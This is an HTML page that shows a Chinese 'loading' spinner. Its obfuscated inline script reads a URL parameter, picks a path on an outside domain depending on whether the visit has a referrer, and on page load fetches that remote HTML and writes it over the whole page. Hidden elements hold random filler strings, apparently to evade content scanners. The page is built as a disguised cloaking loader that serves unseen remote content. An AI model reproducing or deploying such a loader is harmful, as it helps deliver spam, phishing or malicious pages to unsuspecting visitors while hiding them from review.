<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .TBffHIsha0v {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .TBffHIsha0v .rpaWgG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .TBffHIsha0v .content {
            line-height: 50px;
            text-align: center
        }

        .TBffHIsha0v .img {
            width: 100%
        }

        .TBffHIsha0v .acdLU2G6hLx {
            text-align: center
        }

        .TBffHIsha0v .acdLU2G6hLx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .TBffHIsha0v .acdLU2G6hLx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .TBffHIsha0v .acdLU2G6hLx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .TBffHIsha0v .acdLU2G6hLx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .TBffHIsha0v .acdLU2G6hLx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .TBffHIsha0v .acdLU2G6hLx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .TBffHIsha0v .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TdrQfoQKLc(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EnCvdq = TdrQfoQKLc('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EnCvdq +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EnCvdq +".html?a=share";
		}
		
        TMwvvPa0D=url+"#"+new Date().getTime();
        TMwvvPa0D && function() {
            $.get(TMwvvPa0D, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >GIjD6baVsWx02vsofdwECqzn41427SricxOTXzSgw2Kw5Y6esiAyhL8NqNjWZVG4bLmkz5wogJL4zIP8QpEiRfv2vQRJCXYBPvT</h1>
<img  src='' style='display:none'>
<ul style='display:none' >jJtJluTx714b6XMjp8IXt2q4mvi7SySv3CFM15vjgQ8M9Qx6xuz5Tn4A9gW7Z9cA76EW5ie4GTW9mAzQO96AKK29qwQrTKff</ul>
<a  href='#' style='display:none'>E6yzfWtJimwfxUXKlpLf7vnGZfOgqqT5C5NC2fz0pzFhfTc8qEfSt3dWICqTo8cxpB8XDjEYVsFuJ</a>
<a  href='#' style='display:none'>E6yzfWtJimwfxUXKlpLf7vnGZfOgqqT5C5NC2fz0pzFhfTc8qEfSt3dWICqTo8cxpB8XDjEYVsFuJ</a><div class="TBffHIsha0v">
    <div class="rpaWgG">
        <div class="acdLU2G6hLx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<div style='display:none'>olQTQKpV96rVCvLn9fE3jKrgXEcCI1nOtknAk4VaoUm6wj</div>
<p  style='display:none'>oLhWfBlZtM2N0tMj4lS856yBLZrayt31Ym2a5nTHnCJISN5Ohmmsj0a2gM3KPuoqfo7</p>
<li style='display:none' >qVOCtRHTnsMu5BSOupm4A4MjkVGky8NoI6YObMKSTmqmzE3xnFsvCy1y9fooTbtF</li>
<li style='display:none' >qVOCtRHTnsMu5BSOupm4A4MjkVGky8NoI6YObMKSTmqmzE3xnFsvCy1y9fooTbtF</li>
<a  href='#' style='display:none'>hAIHlxZcfyGvhzR8VC17tpQ25dbjXHL54DF0zvk4olTZOSJ7IVWNy1fxvu3Y3XHvSySnWL7yALAKThId</a></body>
</html>